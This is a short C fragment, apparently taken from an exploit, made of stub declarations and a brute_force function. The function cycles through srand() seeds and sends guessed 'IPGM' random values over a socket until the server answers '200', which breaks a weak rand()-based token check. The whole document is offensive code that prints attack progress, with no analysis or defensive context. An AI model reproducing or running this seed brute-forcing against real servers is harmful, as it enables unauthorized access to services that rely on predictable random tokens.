
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int LOCAL_NET () ;
 scalar_t__ SEED_MAX ;
 scalar_t__ SEED_START ;
 int SIZ ;
 int fflush (int ) ;
 int memset (char*,int ,int) ;
 int my_send (int,char*,int) ;
 int printf (char*,...) ;
 int rand () ;
 int recv (int,char*,int,int ) ;
 scalar_t__ seed ;
 int srand (scalar_t__) ;
 int stdout ;
 int strncmp (char*,char*,int) ;

int brute_force(int s) {
        char buf[SIZ];
 int exitFlag=0, randomNum;


 seed=SEED_START;
        while(!exitFlag && seed<=SEED_MAX) {
  printf("[-] Bruteforcing ... %d of %d\r", seed, SEED_MAX);fflush(stdout);
  srand(seed);
                my_send(s, "IPGM %d\n", (randomNum=rand()));
  memset(buf,0,SIZ-1);
  LOCAL_NET();
                recv(s, buf, SIZ-1, 0);
                if(!strncmp(buf, "200",3))
                        exitFlag=1;
  seed++;
        }
 printf("                                                               \r");




 if(exitFlag)
  return randomNum;
 else
  return -1;
}
